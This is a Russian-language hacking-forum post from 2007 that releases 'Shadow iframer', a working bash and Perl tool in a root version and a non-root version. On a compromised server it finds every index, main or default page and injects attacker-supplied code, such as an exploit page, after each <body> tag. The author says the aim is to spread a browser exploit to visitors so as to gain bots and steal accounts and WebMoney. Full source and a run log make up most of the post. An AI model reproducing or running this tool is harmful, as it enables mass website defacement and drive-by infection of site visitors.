Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Shadow iframer [local] | [local][n0b0dy] version |
03.01.2007, 05:46
|
|
Участник форума
Регистрация: 23.11.2006
Сообщений: 226
Провел на форуме:
1045663
Репутация:
864
|
|
Shadow iframer [local] | [local][n0b0dy] version
Shadow iframer[local] [r00t] & [n0b0dy] versions
[ I Что? ]
Shadow iframer (нормального названия не смог придумать =\) - небольшой ифреймер, написанный мной сегодня ночью 
Как известно, ифреймер - небольшая программа (а какие лоси пытались продать нечто подобное за 25$ ) для вставки своего кода в php/html файлы. Смысл в этом такой:
Например, вам слили очередной превад сплойт из превада ачата. Сплойтенг берет все ослы, до седьмого включительно. Ясное дело, что его необходимо заюзать и поиметь энное кол-во ботов\асек\3.14зженный вебмань
А у вас под рукой как раз есть небольшой хостинг, который вы недавно порутали. на нем есть несколько К хтмл страниц, вставлять код в каждую ручками очень накладно. Этим и занимаюсться ифреймеры. Они автоматически вставляют некоторый код в html\php паги. Обычно это делается удаленно (например по фтп) или локально.
Эта версия - локальная.
[ II Как? ]
Для начала расскажу немного об устройстве этого скрипта.
Скрипт написан на баше с перловыми вставками. Т.к. подразумевается что трояниться будут все страницы, то скрипт соответственно требует рута. Конечно, переписать его под нобади\нерута и конкретную диру можно (но нужно ли?)).
По размеру скрипт достаточно маленький 
Использовать его очень просто. Нужно только запустить с один параметром - файлом с ифрейм кодом (естественно, код может быть любым)). Далее скрипт найдет все index файлы и вставит в них ваш код. Добавление идет в начало body скрипта.
Вот лог запуска:
Код:
# ./iframe.sh
[*]Searching for perl.../usr/bin/perl
[*]Starting index finder...please wait...search complete. Found X pages
[*]Generating iframer...complete.Starting iframer
[*] Injecting complete, deleting temp files...
[*] Finished
[ III Sources&outro ]
Собственно сорец:
[r00t] version
Код:
#!/bin/bash
if [ $UID != 0 ]; then
echo "[x]Need r00t :("; exit 1;
fi
check=`expr length "$1"`
if [ $check == 0 ]; then
echo "########################################"
echo "#Shadow iframer[local] (c)ode by Gh0s7#"
echo "########################################"
echo "#usage: ./sh-iframe.sh [iframe file] #"
echo "# ./sh-iframe.sh exploit.html #"
echo "########################################"
exit 1
fi
echo -n "[*]Searching for perl..."; which perl
if [ $? != 0 ]; then
echo "[x]No perl?"; exit
fi
echo -n "[*]Starting index finder...please wait..."
find / -name "index.html*" 2> /dev/null > /tmp/found
find / -name "index.php*" 2> /dev/null >> /tmp/found
find / -name "index.shtml" 2> /dev/null >> /tmp/found
find / -name "index.phtml" 2> /dev/null >> /tmp/found
find / -name "main.html*" 2> /dev/null > /tmp/found
find / -name "main.php*" 2> /dev/null >> /tmp/found
find / -name "default.php*" 2> /dev/null >> /tmp/found
find / -name "main.shtml" 2> /dev/null >> /tmp/found
len=`cat /tmp/found| wc -l`
echo "search complete. Found $len pages"
echo -n "[*]Generating iframer..."
iframer='\n
while (<INPUT>) {
chomp; $file = $_;
@res = split (/\//);
$len = 0;
foreach (@res) { $len++; }
open (FILE, "<$_") or die;
open (TMP, ">/tmp/$res[$len-1]") or die;
open (INJECT, "<$inject") or die;
sysread (INJECT, $code, 1024);
close (INJECT);
while (<FILE>) {
print TMP $_;
if (/<body>/) { print TMP $code; }
}
close (TMP);
close (FILE);
system ("./rm /tmp/$res[$len-1].bak 2>/dev/null");
system ("./mv $file /tmp/$res[$len-1].bak");
system ("./mv /tmp/$res[$len-1] $file");
}'
echo -ne "#!/usr/bin/perl -w\nopen (INPUT, \"</tmp/found\");\n\$inject=\"$1\";\n" > iframer.pl
echo -ne "$iframer" >> iframer.pl
echo 'mv $@' > ./mv; chmod +x ./mv
echo 'rm $@' > ./rm; chmod +x ./rm
echo "complete.Starting iframer"
perl iframer.pl
echo "[*] Injecting complete, deleting temp files..."
rm mv rm
rm /tmp/index*
echo "[*] Finished"
exit 0
[n0b0dy] version
Код:
#!/bin/bash
usage () {
echo "########################################################"
echo "#Shadow iframer[local][n0b0dy version] (c)ode by Gh0s7#"
echo "########################################################"
echo "#usage: ./sh-iframe.sh [iframe file] [path] #"
echo "# ./sh-iframe.sh exploit.html /var/www/31337.su #"
echo "########################################################"
exit 1
}
check=`expr length "$1"`
if [ $check == 0 ]; then
usage
fi
check=`expr length "$2"`
if [ $check == 0 ]; then
usage
fi
if [ ! -d $2 ]; then
echo "[x] $2 directory doesnt exists"; exit 1
fi
echo -n "[*]Searching for perl..."; which perl
if [ $? != 0 ]; then
echo "[x]No perl?"; exit
fi
echo -n "[*]Starting index finder...please wait..."
find $2 -name "index.html*" 2> /dev/null > /tmp/found
find $2 -name "index.php*" 2> /dev/null >> /tmp/found
find $2 -name "index.shtml" 2> /dev/null >> /tmp/found
find $2 -name "index.phtml" 2> /dev/null >> /tmp/found
find $2 -name "main.html*" 2> /dev/null > /tmp/found
find $2 -name "main.php*" 2> /dev/null >> /tmp/found
find $2 -name "default.php*" 2> /dev/null >> /tmp/found
find $2 -name "main.shtml" 2> /dev/null >> /tmp/found
len=`cat /tmp/found| wc -l`
echo "search complete. Found $len pages"
echo -n "[*]Generating iframer..."
iframer='\n
while (<INPUT>) {
chomp; $file = $_;
@res = split (/\//);
$len = 0;
foreach (@res) { $len++; }
open (FILE, "<$_") or next;
open (TMP, ">/tmp/$res[$len-1]") or next;
open (INJECT, "<$inject") or die;
sysread (INJECT, $code, 1024);
close (INJECT);
while (<FILE>) {
print TMP $_;
if (/<body>/) { print TMP $code; }
}
close (TMP);
close (FILE);
system ("./rm /tmp/$res[$len-1].bak 2>/dev/null");
system ("./mv $file /tmp/$res[$len-1].bak");
system ("./mv /tmp/$res[$len-1] $file");
}'
echo -ne "#!/usr/bin/perl -w\nopen (INPUT, \"</tmp/found\");\n\$inject=\"$1\";\n" > iframer.pl
echo -ne "$iframer" >> iframer.pl
echo 'mv $@' > /tmp/mv; chmod +x /tmp/mv
echo 'rm $@' > /tmp/rm; chmod +x /tmp/rm
echo "complete.Starting iframer"
perl iframer.pl
echo "[*] Injecting complete, deleting temp files..."
rm /tmp/mv /tmp/rm
rm /tmp/index*
echo "[*] Finished"
exit 0
В ближайшее время будет закончен фтп ифреймер.
В заключение попрошу каментить и оценивать (как обычно)
P.S. Я не утверждаю что это мега-релиз, так что кричать что "мало" и т.д. не надо.
P.P.S. Читаем и отписываемся: https://forum.antichat.ru/thread30461.html
UPD 1:
Добавил версию для "кастрированных" аков.
Последний раз редактировалось Gh0s7; 10.01.2007 в 19:32..
Причина: хуле?
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид